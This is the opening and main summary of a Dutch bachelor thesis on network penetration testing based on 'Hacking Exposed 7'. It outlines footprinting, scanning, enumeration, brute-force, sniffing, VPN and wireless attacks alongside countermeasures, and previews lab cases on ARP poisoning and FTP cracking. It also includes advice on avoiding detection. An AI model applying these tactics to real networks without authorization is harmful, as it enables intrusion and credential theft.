Hogeschool-Universiteit Brussel Faculteit Bedrijfskunde Studiegebied Bedrijfskunde Bachelor in de toegepaste Informatica Hacking Exposed Bachelorproef aangeboden door Nathan Boone tot het behalen van de graad van Bachelor in de Toegepaste Informatica Academiejaar 2013 – 2014
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Hogeschool-Universiteit Brussel
Faculteit Bedrijfskunde Studiegebied Bedrijfskunde
Bachelor in de toegepaste Informatica
Hacking Exposed
Bachelorproef aangeboden door
Nathan Boone
tot het behalen van de graad van
Bachelor in de Toegepaste Informatica
Academiejaar 2013 – 2014
Pagina opzettelijk blanco gelaten
© Nathan Boone
Voorwoord Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken, welbepaald in netwerkbeveiliging. Computernetwerken interesseert me omdat dit een onderdeel is waarop informatica tegenwoordig gebaseerd is. Zo goed als iedereen die een computer gebruikt, gebruikt een netwerk. Enerzijds als entertainment: dit gaat dan van online spelletjes te spelen tot sociale media op de smartphone. Anderzijds op professioneel vlak: bedrijven die verschillende vestigingen hebben en die met elkaar willen communiceren via een netwerk. Bij al deze zaken is netwerkbeveiliging een zeer belangrijk aspect, waarvan velen zelfs niet weten dat dit bestaat.
Aangezien ik zo gefascineerd ben door netwerken heb ik gekozen om hier mijn eindwerk rond te maken. Ik hoop mijn eindwerk tot een goed einde te brengen, mijn diploma te behalen en zo een stap dichter komen tot de carrière die ik graag wil uitbouwen in het vak netwerkbeveiliging.
In het tweede semester ga ik naar Salzburg, om daar een stage te doen rond netwerkbeveiliging en virtualisatie. De kennis die ik opgedaan heb doorheen deze bachelor proef, zal ik zeker ook kunnen gebruiken tijdens mijn stage. Naast mijn stage zou ik mij ook graag certifiëren bij Cisco.
Mijn dank gaat uit naar de heer Andy Van Maele om mij op het idee te zetten om mijn eindwerk rond netwerkbeveiliging te doen. Ook zou ik graag dank willen uitbrengen aan de heer Yvan Rooseleer en de heer Gert Cauwenbergh omdat ze altijd klaarstonden als er vragen waren. De heer Serge Van Cleynenbreugel zou ik ook graag willen bedanken voor zijn feedback als mentor. Zo wist ik dat ik goed bezig was.
© Nathan Boone
Pagina opzettelijk blanco gelaten
© Nathan Boone
Inhoudsopgave Voorwoord .............................................................................................................................................. 3
Inleiding ................................................................................................................................................. 13
Hoofdtekst ............................................................................................................................................. 15
1 Stappenplan ................................................................................................................................... 15
1.1 Footprinting ........................................................................................................................... 15
1.1.1 Google ........................................................................................................................... 15
1.1.2 Social Engineering.......................................................................................................... 15
1.2 Scanning ................................................................................................................................ 16
1.2.1 ARP Host Discovery ....................................................................................................... 16
1.2.2 ICMP Host Discovery ..................................................................................................... 16
1.2.3 TCP/UDP Host Discovery ............................................................................................... 16
1.3 Enumeratie ............................................................................................................................ 16
1.4 Hacking Unix .......................................................................................................................... 17
1.4.1 Brute-force .................................................................................................................... 17
1.4.2 Sniffer ............................................................................................................................ 17
1.5 Virtual Private Network ......................................................................................................... 17
1.6 Draadloze Hacking ................................................................................................................. 18
2 Verschillende cases ....................................................................................................................... 18
2.1 Case 1: Scanning en Intrusion Prevention System opstellen ................................................ 18
2.1.1 Scans .............................................................................................................................. 18
2.1.2 Intrusion Prevention System ......................................................................................... 18
2.2 Case 2: Netwerkverkeer afluisteren ...................................................................................... 19
2.2.1 Aanval ............................................................................................................................ 19
2.2.2 Verdediging ................................................................................................................... 19
2.3 Case 3: FTP beheren en hacken ............................................................................................. 19
3 Conclusie ....................................................................................................................................... 19
Lijst met bijlagen ................................................................................................................................... 21
Woordenlijst .......................................................................................................................................... 23
Prince 2TM - Project Initiation Document ............................................................................................... 27
1 Project Definition .......................................................................................................................... 27
2 Background .................................................................................................................................... 27
3 Project objectives .......................................................................................................................... 27
4 Desired outcomes .......................................................................................................................... 28
5 Project scope and exclusions ......................................................................................................... 28
6 Constraints and assumptions ........................................................................................................ 28
© Nathan Boone
7 The user(s) and any other known interested parties .................................................................... 28
8 Interfaces ....................................................................................................................................... 29
9 Project Approach ........................................................................................................................... 29
10 Project Management Team Structure ....................................................................................... 29
11 Role Descriptions ....................................................................................................................... 30
12 Quality Management Strategy .................................................................................................. 30
13 Configuration Management Strategy ........................................................................................ 31
14 Risk Management Strategy ....................................................................................................... 31
15 Communication Management Strategy .................................................................................... 31
16 Project Plan................................................................................................................................ 32
17 Project Controls ......................................................................................................................... 32
Stap 1: Footprinting ............................................................................................................................... 33
1 Inleiding ......................................................................................................................................... 33
2 Openbaar beschikbare informatie ................................................................................................ 33
2.1 Inleiding ................................................................................................................................. 33
2.2 Website ................................................................................................................................. 33
2.2.1 Commentaar .................................................................................................................. 33
2.2.2 Web Application Brute Forcing ..................................................................................... 33
2.3 Google Maps .......................................................................................................................... 34
2.4 Social Engineering ................................................................................................................. 34
2.5 Google Hacking Database (GHDB) ......................................................................................... 34
2.5.1 SiteDigger ...................................................................................................................... 34
2.6 FOCA 3.2 ................................................................................................................................ 35
2.7 Shodanhq ............................................................................................................................... 35
2.8 Forums ................................................................................................................................... 35
2.9 Openbaar beschikbare informatie Tegenmaatregels ........................................................... 35
3 WHOIS and DNS Enumeration ....................................................................................................... 36
3.1 Opzoeken van een IP-adres Tegenmaatregels ...................................................................... 37
3.2 DNS Interrogatie .................................................................................................................... 38
3.2.1 Zone transfers ................................................................................................................ 38
3.2.2 DNS-zone transfer Tegenmaatregels............................................................................. 39
4 Network Reconnaissance .............................................................................................................. 39
4.1 Tracerouting .......................................................................................................................... 39
4.1.1 Hoe werkt traceroute? .................................................................................................. 39
4.2 Network Reconnaissance Tegenmaatregels ......................................................................... 40
4.2.1 NIDS ............................................................................................................................... 40
© Nathan Boone
4.2.2 IPS .................................................................................................................................. 40
4.2.3 Conclusie ....................................................................................................................... 40
5 Conclusie ....................................................................................................................................... 40
Stap 2: Scanning .................................................................................................................................... 43
1 Algemene Inleiding ........................................................................................................................ 43
2 Host Discovery ............................................................................................................................... 43
3 ARP Host Discovery ....................................................................................................................... 43
3.1 MAC-ADRES ........................................................................................................................... 43
3.2 ARP-protocol ......................................................................................................................... 44
3.3 ARP-netwerk scan .................................................................................................................. 45
4 ICMP Host Discovery ..................................................................................................................... 46
4.1 ICMP Host Discovery Tegenmaatregel ................................................................................. 47
4.1.1 Gebruik van een Intrusion Detection System ................................................................ 47
4.1.2 Preventie van ping sweeps ............................................................................................ 47
5 TCP / UDP Host Discovery ............................................................................................................. 48
5.1 Poort scanning ....................................................................................................................... 48
5.1.1 Verschil tussen TCP en UDP ........................................................................................... 48
5.1.2 Programma’s waarmee je TCP en UDP scans kan uitvoeren ........................................ 50
6 Netwerk verkenning tools ............................................................................................................. 51
6.1 Nmap ..................................................................................................................................... 51
6.1.1 ICMP .............................................................................................................................. 51
6.1.2 TCP/UDP poort scanning ............................................................................................... 51
6.2 Hping3 en Nping .................................................................................................................... 55
6.2.1 ICMP scan ...................................................................................................................... 55
6.2.2 TCP/UDP port scanning ................................................................................................. 56
6.3 ScanLine ................................................................................................................................. 57
6.4 netcat ..................................................................................................................................... 57
6.4.1 TCP poortscan ................................................................................................................ 57
6.4.2 UDP poortscan ............................................................................................................... 58
6.5 SuperScan .............................................................................................................................. 58
6.6 Poort scans Tegenmaatregels ............................................................................................... 59
6.6.1 Snort IDS ........................................................................................................................ 59
6.6.2 Treshold logging ............................................................................................................ 59
6.6.3 Onnodige services afzetten ........................................................................................... 59
6.6.4 Voorzichtig te werk gaan met tegenmaatregels ........................................................... 59
7 Raden naar het besturingssysteem ............................................................................................... 60
© Nathan Boone
7.1 Active Stack Fingerprinting .................................................................................................... 60
7.2 Passive Stack Fingerprinting .................................................................................................. 61
7.3 Raden naar het besturingssysteem Tegenmaatregels .......................................................... 61
8 Processing and storing scan data .................................................................................................. 62
Stap 3: Ennumeratie .............................................................................................................................. 63
1 Inleiding ......................................................................................................................................... 63
2 Nmap version scanning ................................................................................................................. 63
2.1 TCP SYN poortscan ................................................................................................................ 64
2.2 TCP versiescan ....................................................................................................................... 64
3 Basic Banner Grabbing .................................................................................................................. 65
3.1 Banner Grabbing met Telnet ................................................................................................. 65
3.2 Banner Grabbing Tegenmaatregels ....................................................................................... 66
4 Enumerating veel voorkomende services ..................................................................................... 66
4.1 FTP Enumeration, TCP 21 ...................................................................................................... 66
4.1.1 FTP anonymous access .................................................................................................. 66
4.1.2 FTP Tegenmaatregels .................................................................................................... 67
4.2 Telnet Enumeratie, TCP 23 .................................................................................................... 67
4.2.1 System Enumeratie via Telnet Banners ......................................................................... 67
4.2.2 User Enumeratie via Telnet ........................................................................................... 68
4.2.3 Telnet Enumeratie Tegenmaatregels ............................................................................ 68
4.3 TFTP Enumeratie, TCP/UDP 69 .............................................................................................. 68
4.3.1 Bestanden kopiëren met een Linux TFTP Server ........................................................... 68
4.3.2 Accessing Router/Switch Configurations via TFTP ........................................................ 68
4.3.3 TFTP Enumeratie Tegenmaatregels ............................................................................... 69
4.4 IPSec/IKE, UDP 500 ................................................................................................................ 69
4.4.1 Probing IPSec tunnel ...................................................................................................... 69
4.4.2 IPSec/IKE Enumeratie Tegenmaatregels ....................................................................... 69
Stap 4: Hacking Unix .............................................................................................................................. 71
1 Inleiding ......................................................................................................................................... 71
2 Brute-force Aanval......................................................................................................................... 71
2.1 Brute-force aanval toepassen ............................................................................................... 71
2.2 Brute-Force aanval Tegenmaatregels ................................................................................... 72
3 File Transfer Protocol .................................................................................................................... 73
3.1 FTP-server aanvallen ............................................................................................................. 73
3.2 FTP aanval Tegenmaatregels ................................................................................................ 73
4 Secure Shell ................................................................................................................................... 74
© Nathan Boone
4.1 SSH ......................................................................................................................................... 74
4.2 SSH Tegenmaatregels ........................................................................................................... 74
5 Sniffers ........................................................................................................................................... 74
5.1 Wat is een sniffer? ................................................................................................................. 74
5.2 Aanvaller ................................................................................................................................ 74
5.3 Administrator ........................................................................................................................ 74
5.4 Hoe werkt een sniffer? .......................................................................................................... 74
5.5 Voorbeeld van een sniffer ..................................................................................................... 74
5.6 Populaire sniffers ................................................................................................................... 76
5.7 Sniffers Tegenmaatregel....................................................................................................... 76
5.7.1 Migreren naar een switched netwerk topologie ........................................................... 76
5.7.2 Sniffers detecteren ........................................................................................................ 76
5.7.3 Encryptie (SSH, IPSec) .................................................................................................... 76
6 Honeypot server ............................................................................................................................ 77
Stap 5: Virtual Private Network ............................................................................................................. 79
1 Inleiding ......................................................................................................................................... 79
2 Virtual Private Network (VPN) ....................................................................................................... 79
2.1 De tot stand komst van een IPSec VPN ................................................................................. 80
2.1.1 Internet Key Exchange Fase 1 (IKE Fase 1) .................................................................... 80
2.1.2 Internet Key Exchange Fase 2 (IKE Fase 2) .................................................................... 81
2.2 Site-to-site VPN ..................................................................................................................... 82
2.3 Client-to-site VPN .................................................................................................................. 82
2.4 Google hacking voor VPN ...................................................................................................... 82
2.4.1 Google hacking voor VPN Tegenmaatregel ................................................................... 83
2.5 Probing IPSec VPN Servers .................................................................................................... 83
2.5.1 Probing IPSec VPN Servers Tegenmaatregel ................................................................. 83
2.6 Attacking IKE Aggressive Mode ............................................................................................. 84
2.6.1 Attacking IKE Aggressive Mode Tegenmaatregel .......................................................... 84
Stap 6: Wireless Hacking ....................................................................................................................... 85
1 Inleiding ......................................................................................................................................... 85
2 Achtergrond ................................................................................................................................... 85
3 Channels en frequenties ................................................................................................................ 85
4 Verschillende types Wi-Fi .............................................................................................................. 86
4.1 Ad-hoc ................................................................................................................................... 86
4.2 Infrastructure ........................................................................................................................ 86
5 Manieren om een draadloos netwerk te beveiligen ..................................................................... 87
© Nathan Boone
5.1 Basis methodes ...................................................................................................................... 87
5.1.1 MAC filtering .................................................................................................................. 87
5.1.2 Verborgen draadloze netwerken .................................................................................. 87
5.1.3 Antwoorden op probe requests .................................................................................... 87
5.2 Authenticatie ......................................................................................................................... 88
5.2.1 WPA four-way handshake ............................................................................................. 88
5.3 Encryptie ................................................................................................................................ 89
6 Discovery en monitoren ................................................................................................................ 90
6.1 Active Discovery .................................................................................................................... 90
6.2 Active Discovery Tegenmaatregels ....................................................................................... 90
6.3 Passive Discovery................................................................................................................... 90
6.4 Passive Discovery Tegenmaatregels ...................................................................................... 90
6.5 Discovery tools ...................................................................................................................... 90
6.5.1 Kismet ............................................................................................................................ 91
6.5.2 Airodump-ng .................................................................................................................. 91
7 Denial of service attack ................................................................................................................. 92
7.1 De-authenticatie aanval ........................................................................................................ 92
7.1.1 airplay-ng ....................................................................................................................... 92
8 Encryptie aanval ............................................................................................................................ 93
8.1 WEP ....................................................................................................................................... 93
8.1.1 Achtergrond bij WEP encryptie ..................................................................................... 93
8.1.2 Passieve aanval .............................................................................................................. 93
8.2 ARP Replay with Fake authenticaton .................................................................................... 94
8.2.1 Aanval met de aircrack-ng suite .................................................................................... 95
8.2.2 WEP Hacking Tegenmaatregels ..................................................................................... 96
Case 1: Scannen en IPS instellen ........................................................................................................... 97
1 Inleiding ......................................................................................................................................... 97
2 Topologie Diagram ........................................................................................................................ 97
3 IP-adressen tabel ........................................................................................................................... 97
4 Objectieven ................................................................................................................................... 97
5 Stappenplan ................................................................................................................................... 98
5.1 Stap 1: Testnetwerk opstellen en uittesten .......................................................................... 98
5.1.1 IP-adressen instellen ..................................................................................................... 98
5.1.2 OSPF instellen ................................................................................................................ 98
5.1.3 Testnetwerk uittesten ................................................................................................... 99
5.2 Stap 2: Netwerk scannen ....................................................................................................... 99
© Nathan Boone
5.2.1 ARP-scan ........................................................................................................................ 99
5.2.2 Ping-sweep .................................................................................................................. 100
5.2.3 TCP poortscan .............................................................................................................. 100
5.2.4 Intense scan ................................................................................................................. 101
5.3 Stap 3: Intrusion Prevention System ................................................................................... 102
5.3.1 Intrusion Prevention System instellen ........................................................................ 102
6 Conclusie ..................................................................................................................................... 112
Case 2: Netwerkverkeer afluisteren .................................................................................................... 113
1 Inleiding ....................................................................................................................................... 113
2 Topologie Diagram ...................................................................................................................... 113
3 IP Adressen Tabel ........................................................................................................................ 114
4 Objectieven ................................................................................................................................. 114
5 Stappenplan ................................................................................................................................. 114
5.1 Stap 1: Testnetwerk opstellen en uittesten ........................................................................ 114
5.1.1 IP-adressen en een default-route instellen op de HoofdRouter ................................. 115
5.1.2 DHCP server configureren ........................................................................................... 115
5.1.3 Testnetwerk uittesten ................................................................................................. 116
5.2 Stap 2: Netwerk scannen ..................................................................................................... 117
5.3 Stap 3: ARP poisoning toepassen en Telnet verkeer afluisteren ........................................ 118
5.3.1 ARP Poisoning .............................................................................................................. 118
5.3.2 ARP Poisoning met Ettercap ........................................................................................ 119
5.4 Stap 4: MAC table flooding .................................................................................................. 121
6 Tegenmaatregel tegen afluisteren van het netwerk ................................................................... 122
6.1 Switchport port security ...................................................................................................... 122
6.2 Dynamic ARP-inspection ..................................................................................................... 122
6.3 SSH in plaats van Telnet ...................................................................................................... 123
7 Conclusie ..................................................................................................................................... 123
Case 3: FTP beheren en aanvallen ....................................................................................................... 125
1 Inleiding ....................................................................................................................................... 125
2 Benodigdheden ........................................................................................................................... 125
2.1 FTP server ............................................................................................................................ 125
2.2 FTP client ............................................................................................................................. 125
3 Objectieven ................................................................................................................................. 125
4 Stappenplan ................................................................................................................................. 126
1. FTP server installeren en configureren ................................................................................... 126
2. FTP server configureren voor anonieme toegang ................................................................... 127
© Nathan Boone
3. Logging inschakelen ................................................................................................................. 129
4. Server proberen kraken ........................................................................................................... 131
5. Conclusies trekken ................................................................................................................... 131
6. Anonieme toegang uitschakelen, configuratie aanpassen en accounts aanmaken ............... 131
7. Server proberen kraken ........................................................................................................... 133
5 Conclusie ..................................................................................................................................... 136
Bibliografie .......................................................................................................................................... 137
1 Websites ...................................................................................................................................... 137
2 Boeken ......................................................................................................................................... 137
Timesheets .......................................................................................................................................... 138
1 Tijdstabel Hacking Exposed ......................................................................................................... 138
2 Tijdstabel Netwerk Security ........................................................................................................ 144
Curriculum vitae Nathan Boone ......................................................................................................... 150
De presentatie ..................................................................................................................................... 152
© Nathan Boone
Inleiding De meeste netwerkgebruikers zijn tevreden als ze het internet kunnen gebruiken voor allerhande doeleinden. Ze zijn niet bewust van de gevaren dat dit met zich meebrengt.
Het project dat ik gerealiseerd heb, is een stappenplan dat een netwerk beheerder kan gebruiken om na te gaan of zijn netwerk veilig is. Dit zijn natuurlijk ook stappen die een hacker kan gebruiken om binnen te breken in een netwerk.
Deze stappen omvatten enerzijds aanvallen die kunnen uitgevoerd worden door de hacker en anderzijds, tegenmaatregelen die gebruikt kunnen worden door de netwerkbeheerder.
Als basis voor dit eindwerk heb ik de methodiek gebruikt zoals beschreven staat in het boek Hacking Exposed 7. Dit boek is geschreven door Stuart McClure, Joel Scambray en George Kurtz. Als keuzevak heb ik het vak CCNA Security gevolgd, gedoceerd door Yvan Rooseleer. Dit heeft me nog een andere kijk gegeven op netwerkbeveiliging en hoe dit in een netwerk kan geïmplementeerd worden en wat de “best practices” zijn.
Om vele aanvallen die besproken staan in dit document uit te voeren heb ik Backtrack 5 r3 geïnstalleerd. Dit is een besturingssysteem dat speciaal ontworpen is om aan “penetration testing” te doen. Dit is de vorm van hacking die besproken zal worden.
In de hoofdtekst zullen de verschillende stappen in de methodiek kort en bondig besproken worden. De tegenmaatregels en meer informatie over de stappen zijn terug te vinden in de bijlagen.
In dit document gaat het zowel over aanvallen als tegenmaatregels. De tegenmaatregels heb ik gekenmerkt door er een verbodsteken voor te plaatsen.
Er zijn vrij veel commando’s gebruikt in deze tekst. Om een duidelijk onderscheid te brengen tussen de tekst en de commando’s heb ik de deze stijl gebruikt om de commando’s te kenmerken.
13
© Nathan Boone
Pagina opzettelijk blanco gelaten
14
© Nathan Boone
Hoofdtekst De hoofdtekst bestaat uit twee delen, een stappenplan en een overzicht van de verschillende cases.
1 Stappenplan Dit is een stappenplan van 6 stappen volgens de methodiek besproken in het boek “Hacking Exposed 7. In dit stappenplan zullen de stappen één voor één uitgelegd worden. Een gedetailleerdere uitleg en gedane testen zijn terug te vinden in de bijlagen.
1.1 Footprinting Je kan niet zomaar ergens binnenbreken en het netwerk beginnen te hacken, want dit zou tot weinig succes leiden. Deze eerste stap is het in kaart brengen van de onderneming of de persoon bij wie je wil inbreken. Als je wil inbreken in een huis moet je zeker ook eerst de omgeving analyseren voor je zal kunnen toeslaan, anders zal je heel veel getuigen hebben, en aanwijzingen achterlaten. Bij hacking is het belangrijk dat je zo weinig mogelijk sporen achterlaat. Dit is de moeilijkste taak van de hacker. Iedereen kan hacken, maar de persoon die geen sporen achterlaat is de beste hacker.
Terwijl je je opzoekingswerk aan het doen bent naar de persoon of onderneming in kwestie, is het belangrijk dat je geen sporen achterlaat. Dit om te voorkomen dat ze weten dat er een aanval zal plaatsvinden. Ze kunnen dan ook geen voorzorgsmaatregelen nemen tegen de bepaalde aanval die jij wil plegen.
1.1.1 Google Google is een zoekmachine die veel gebruikt wordt bij Footprinting. Je kan er allerhande zoektermen ingeven om zo naar personen, bedrijven en zelfs configuraties van toestellen te zoeken. Deze speciale zoektermen zijn te vinden in de “Google Hacking Database” (GHDB).
Door te zoeken naar een eventueel probleem bij het instellen van een netwerk, kan je zo aan geldige IP-adressen komen. Vele netwerkbeheerders die een vraag hebben, stellen deze vraag op een forum zonder de gevoelige gegevens hiervan te wissen.
Google is ook gekend voor zijn “Google Maps” applicatie, welbepaald “Streetview”. Hiermee kan je zoeken naar bedrijven en kan je virtueel zelfs rondlopen op een bedrijventerrein. Dit zou je kunnen doen om te identificeren waar je ongemerkt van in je auto het draadloos netwerk kan infiltreren. Het is belangrijk als bedrijf dat je ervoor zorgt dat het draadloos netwerk niet buiten de bedrijfsmuren gaat. Je kan dit doen door de sterkte van het signaal aan te passen.
1.1.2 Social Engineering Social Engineering is een methode die zeer veel gebruikt wordt om aan Footprinting te doen. Zo goed als iedereen of elk bedrijf heeft wel ergens een profiel op sociale media. Dit kan gaan van een professionele pagina op LinkedIn tot een pagina op Facebook waar private informatie op te vinden is. Op deze manier is het gemakkelijk opzoekingswerk te verrichten over de persoon of het bedrijf in kwestie zonder dat zij hier iets van te weten komen.
15
© Nathan Boone
1.2 Scanning In stap Footprinting ging het over het in kaart brengen van een bedrijf en hoe je verschillende gevoelige gegevens kan te weten komen. In deze stap gaan we hierin verder, hier zullen we verschillende scans uitvoeren om zo het netwerk van het betreffende bedrijf in kaart te brengen. We zullen ook te weten kunnen komen hoe we door firewalls kunnen dringen en welke apparaten met welke services in het netwerk actief zijn.
Op een netwerk zijn verschillende manieren van “Host Discovery” mogelijk.
1.2.1 ARP Host Discovery Bij ARP Host Discovery zal je gebruik maken van het ARP-protocol om aan Host Discovery te doen. Je kan aan een range van IP-adressen ARP-Requests sturen. Door het ARP-protocol zullen de hosts met de bepaalde IP-adressen antwoorden met een ARP-Reply. Als je een ARP-Reply terugkrijgt, weet je dus dat die host aanwezig is op het netwerk.
1.2.2 ICMP Host Discovery Bij ICMP Host Discovery zal je naar de verschillende IP-adressen ICMP Echo Requests sturen. Van de toestellen waarvan je een ICMP Echo Reply terugkrijgt, weet je dat ze aanwezig zijn op het netwerk.
1.2.3 TCP/UDP Host Discovery Elk toestel heeft TCP of UDP netwerk poorten. Achter deze poorten bevinden zich services, één van deze services is bijvoorbeeld het mogelijk maken naar een website te gaan. Als je naar een website gaat, zal je surfen naar poort 80 omdat poort 80 HTTP is.
Bij TCP/UDP Host Discovery zal je op verschillende manieren een connectie proberen op te bouwen met verschillende poorten. Van de poorten die de connectie aanvaarden, weet je dat de achterliggende service aan staat.
1.3 Enumeratie In stap twee Scanning zijn we op zoek gegaan naar welke services op welke toestellen aanwezig zijn in een netwerk. In deze stap gaan we hier nog verder op in. We zullen bij Enumeratie overgaan tot het identificeren van de service en het besturingssysteem. We kunnen hierbij ook te weten komen welke versie hiervan geïnstalleerd is. Om dit te kunnen doen, zullen we connecties moeten opstellen naar de systemen. Deze connecties zullen waarschijnlijk gelogd worden door het systeem dat je wil aanvallen. Hierdoor bestaat er een mogelijkheid dat je uitgesloten wordt van het netwerk.
Veel van de informatie die je via enumeratie buitmaakt, lijkt op het eerste zicht ongevaarlijk. Maar vooraleer je kan binnenbreken in een systeem zal je eerst de service, poort en versie moeten identificeren. Eens deze geïdentificeerd zijn kan je op zoek gaan naar gekende kwetsbaarheden.
De services die verder uitgelegd worden in de bijlage over Enumeratie zijn:
• FTP: TCP poort 21 • Telnet: TCP poort 23 • TFTP: TCP/UDP poort 69 • IPSec/IKE: UDP poort 500
16
© Nathan Boone
1.4 Hacking Unix In de vorige stappen was het doel om het netwerk in kaart te brengen en informatie te krijgen over de verschillende aanwezige systemen, protocollen en waar deze aanwezig zijn in het netwerk. In deze stap zullen we proberen binnen te breken in de specifieke services. Het doel van deze stap is toegang krijgen tot de systemen en waar het kan “root access” proberen te verkrijgen op de systemen.
Deze stap heet “Hacking Unix”. Er bestaat ook een stap “Hacking Windows” maar omdat de meeste servers bestaan uit Unix-servers hebben we beslist om enkel “Hacking Unix” te bespreken.
1.4.1 Brute-force Om in de services binnen te breken, kan je gebruik maken van een brute-force aanval. Deze aanval zal op een korte tijd zeer veel wachtwoorden en gebruikersnamen uitproberen naar de verschillende services. Wat je meestal doet bij een brute-force aanval, zijn de gebruikersnamen en gegevens over het bedrijf dat je verworven hebt bij Footprinting in bestanden steken. Je kan deze bestanden dan gebruiken als mogelijke wachtwoorden en gebruikersnamen bij de brute-force aanval. De meest gebruikte wachtwoorden zijn, je woonplaats, een simpele cijfercombinatie of je eigen naam.
1.4.2 Sniffer Als je een service zoals Telnet gebruikt, waarbij al de ingetypte tekst in gewoon, niet-geëncrypteerd formaat over het netwerk verstuurd wordt kan je door het netwerkverkeer af te luisteren aan wachtwoorden en gebruikersnamen komen. Hierdoor kan je je inloggen in de bepaalde services.
Een Sniffer is een programma dat het mogelijk maakt om al het netwerkverkeer dat voorbijkomt af te luisteren en te analyseren. Je kan ook een filter plaatsen zodat je enkel de pakketten ziet die je interesseren.
1.5 Virtual Private Network Er zijn zeer veel bedrijven die toelaten dat hun medewerkers van op afstand werken op en naast de systemen die in de onderneming staan. Eén van de voorwaarden hiervan is dat de gegevens veilig bij de onderneming geraken. Om hiervoor te zorgen, gebruiken veel ondernemingen een Virtual Private Network (VPN).
Als je bij een Virtual Private Network kan binnenbreken, dan heb je toegang tot het interne netwerk van dat bedrijf en wordt je aanzien als een vertrouwde gebruiker.
Een VPN heeft vier grote voordelen:
• Confidentialiteit • Data integriteit • Authenticatie • Antireplay
17
© Nathan Boone
1.6 Draadloze Hacking In een bedrijfsomgeving wordt een draadloos netwerk steeds meer gebruikt, omdat het gemakkelijk is als er gasten zijn die hun eigen toestellen meenemen. Dit geldt niet alleen voor gasten, in vele bedrijven wordt er gedaan aan BYOD, dit is de term voor “Bring Your Own Device”. Als hun eigen toestel dan een tablet is, dan is er geen andere keuze dan te kiezen voor een draadloze oplossing voor het netwerk.
Een draadloos netwerk is altijd het punt in het netwerk dat het moeilijkste te beveiligen is. Als je draadloos netwerk tot buiten de fysieke grenzen van je onderneming gaat, heb je zelfs geen sociale controle meer of moet de aanvaller zelfs geen toegang krijgen tot je gebouw, maar kan hij van buiten je gebouw proberen toegang te krijgen tot je draadloos netwerk.
Er bestaan verschillende manieren om je draadloos netwerk te beschermen, maar bij vele van deze manieren is het mogelijk om de beveiligingscodes te kraken en zo een weg naar binnen te vinden.
2 Verschillende cases We hebben drie cases opgesteld en uitgevoerd om zo onze kennis op het vlak van netwerkbeveiliging te testen.
We hebben een case opgesteld over scanning en hoe je ervoor kan zorgen dat je netwerk niet gescand kan worden.
De tweede case gaat over het afluisteren van netwerkverkeer om zo aan wachtwoorden en gebruikersnamen te geraken.
De laatste case gaat over FTP, we hebben een FTP server opgesteld en dan in deze FTP server binnengebroken. In deze case gaat het ook over de tegenmaatregels die je kan nemen.
2.1 Case 1: Scanning en Intrusion Prevention System opstellen In case één wordt besproken hoe je scans kan uitvoeren op een netwerk en hoe je je hiertegen kan beschermen.
2.1.1 Scans De scans die uitgevoerd worden zijn:
• ARP-scan • ICMP-scan • TCP/UDP poortscan
2.1.2 Intrusion Prevention System Met een Intrusion Prevention System (IPS) kan je beperken welk verkeer je netwerk toelaat. Omdat deze inline staat, kan een IPS, verkeer dat niet toegelaten is in het netwerk, niet doorlaten. Hierdoor bereikt dit verkeer zijn eindbestemming niet.
Je kan met een IPS controleren op zowel de eigenschappen van de pakketten als ook op virussen of andere kwaadaardige zaken die aanwezig kunnen zijn in een netwerk.
18
© Nathan Boone
2.2 Case 2: Netwerkverkeer afluisteren In case twee wordt besproken hoe je het verkeer in een netwerk kan omleiden via je computer zonder dat er iemand hier iets van merkt. Hierdoor kan je het netwerkverkeer afluisteren en zo wachtwoorden, gebruikersnamen en gevoelige informatie over het bedrijf of persoon te weten komen.
2.2.1 Aanval Om het netwerkverkeer af te luisteren, zijn er twee verschillende aanvallen die dit kunnen doen. Deze twee aanvallen zijn:
• ARP poisoning • MAC flooding
2.2.2 Verdediging Je kan je tegen beide van deze aanvallen verdedigen. Je zal dan verdedigingsmechanismen gebruiken die je kan instellen in de switch en in de router.
• Dynamic ARP inspection • Switchport security
2.3 Case 3: FTP beheren en hacken FTP (File Transfer Protocol)-servers worden in bedrijven vaak gebruikt om bestanden te delen, die tevens extern kunnen geraadpleegd worden. De taak van een netwerkbeheerder is om de FTP-server toegankelijk te maken voor werknemers, en tegelijk de veiligheid te bewaren zodat onbevoegde personen de server niet kunnen binnendringen.
De manier waarop dit gedaan wordt is door bepaalde configuraties te maken waarmee we accounts verkrijgen, die daarna door bepaalde gebruikers kunnen gebruikt worden en deze te beveiligen met een wachtwoord.
Vooraleer je een aanval uitvoert, moet je eerst weten achter welk IP-adres zich een FTP-server bevindt. Je zal dit te weten komen door een TCP/UDP poortscan uit te voeren. Eens je het IP-adres weet, kan je proberen via anonieme toegang op de FTP server te geraken.
Als anonieme toegang niet werkt, kan je nog altijd een brute-force aanval proberen uit te voeren. Hierbij zal je vele wachtwoorden en gebruikersnamen uitproberen in een korte tijd. Deze gebruikersnamen en wachtwoorden zijn diegene die je gevonden hebt tijdens dat je Footprinting aan het toepassen was.
3 Conclusie Door aan deze bachelor proef te werken heb ik zeer veel kennis opgedaan over netwerkbeveiliging. Deze kennis zal ik op mijn stage in Salzburg en verder in mijn toekomstige carrière zeker kunnen gebruiken. Dit was een zeer interessant eindwerk om aan te werken.
Ik hoop dat dit ook een interessante leidraad is voor een netwerkbeheerder of een andere gebruiker.
19
© Nathan Boone
Pagina opzettelijk blanco gelaten
20
© Nathan Boone
Lijst met bijlagen Woordenlijst .......................................................................................................................................... 23
Prince 2TM - Project Initiation Document ............................................................................................... 27
Stap 1: Footprinting ............................................................................................................................... 33
Stap 2: Scanning .................................................................................................................................... 43
Stap 3: Ennumeratie .............................................................................................................................. 63
Stap 4: Hacking Unix .............................................................................................................................. 71
Stap 5: Virtual Private Network ............................................................................................................. 79
Stap 6: Wireless Hacking ....................................................................................................................... 85
Case 1: Scannen en IPS instellen ........................................................................................................... 97
Case 2: Netwerkverkeer afluisteren .................................................................................................... 113
Case 3: FTP beheren en aanvallen ....................................................................................................... 125
Bibliografie .......................................................................................................................................... 137
Timesheets .......................................................................................................................................... 138
Curriculum Vitae Nathan Boone......................................................................................................... 150
De presentatie .................................................................................................................................... 152
21
© Nathan Boone
Pagina opzettelijk blanco gelaten
22
© Nathan Boone
Woordenlijst Access point: als je connectie maakt met het draadloos netwerk zal je verbinding maken met een accespoint. Deze acces point zal dan verbonden zijn met het bedraad netwerk.
Accounting: bij accounting wordt alles wat je op het systeem uitvoert, bijgehouden.
